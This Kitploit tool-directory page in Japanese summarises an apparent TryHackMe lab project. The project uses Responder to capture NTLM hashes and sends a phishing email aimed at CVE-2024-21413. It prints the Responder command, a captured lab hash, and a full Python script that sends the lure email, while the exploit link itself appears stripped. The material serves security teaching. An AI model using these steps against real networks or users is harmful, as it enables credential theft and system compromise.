Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413 — Responderを介したNTLMハッシュのキャプチャと、CVE-2024-21413を悪用したフィッシングメールの実行を実証し、システムを侵害します。 | Kitploit
ツール/GitHubGitHub/artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413
OSINT (オープンソースインテリジェンス)パスワードクラッキング偵察エクスプロイトフィッシングソーシャルエンジニアリング学習と教育ラボと実践
GitHub

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413

Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413

Responderを介したNTLMハッシュのキャプチャと、CVE-2024-21413を悪用したフィッシングメールの実行を実証し、システムを侵害します。

リポジトリを見る
81年前未レビュー

プロジェクトの目標: このプロジェクトは、ネットワーク上のユーザーからNTLMハッシュをキャプチャするためのさまざまなツールの使用と、メールを使用したフィッシング攻撃の実行を実証するために作成されました。これにより、ネットワーク認証の脆弱性とフィッシング手法がどのように悪用されてシステムが侵害されるかを示しています。

プロセスの説明

  1. Responderを使用したNTLMハッシュのキャプチャ 最初に、Responderツールを使用してネットワーク上の認証ハッシュをキャプチャしました。Responderは、LLMNR、NBT-NS、MDNSなどのクエリをインターセプトしてユーザーのNTLMハッシュを収集できます。これは、キャプチャしたハッシュを使用してシステムへのアクセスを取得する攻撃にとって重要なステップです。

Responderを起動するために次のコマンドを実行しました:

root@ip-10-10-192-145:~# sudo responder -I ens5

ens5インターフェースで待ち受けるようにResponderを設定しました。すぐに認証リクエストのインターセプトを開始し、THM-MONIKERLINK\tryhackmeやWORKGROUP\Administratorなどのネットワーク上のユーザーからのNTLMハッシュを表示できました。ハッシュをキャプチャしたときの出力は次のとおりです:

[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB

これらのハッシュは、ブルートフォース攻撃やハッシュ攻撃などに使用できます。

  1. エクスプロイトを使用したフィッシングメール 次に、悪意のあるファイルへのリンクを含むフィッシングメールを作成しました。smtplibライブラリを使用したPythonスクリプトで、被害者のアドレスにメールを送信しました。メールには、一見安全に見えるが実際には脆弱性を悪用するように設計されたファイルにリンクするHTMLリンクが含まれていました。

メール内のフィッシングリンクは次のようになっていました:

Click me

次に、フィッシングメールを送信するために使用された完全なPythonスクリプトを示します:

import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr

sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")

html_content = """\

Click me

"""

message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email

msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)

server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()

try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)

try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()

このスクリプトは、悪意のあるリンクを含むメールを送信し、CVE-2024-21413の脆弱性を悪用する可能性があります。

結果 その結果、次の2つの重要な側面を実証できました:

  • Responderツールを使用したNTLMハッシュのキャプチャ。これはネットワーク認証への攻撃にとって重要なステップです。
  • Pythonスクリプトを使用したメール経由のフィッシングと脆弱性の悪用。悪意のあるリンクを含むフィッシングメールを送信することで、ユーザーを騙し、システム侵害につながる可能性があります。

このプロジェクトは、ネットワークの脆弱性とフィッシング攻撃がどのように悪用されてシステムへのアクセスが取得されるかを示しました。また、強力な認証方法とメールトラフィックのフィルタリングを通じて、このような攻撃から防御することの重要性を強調しました。

ツールをダウンロード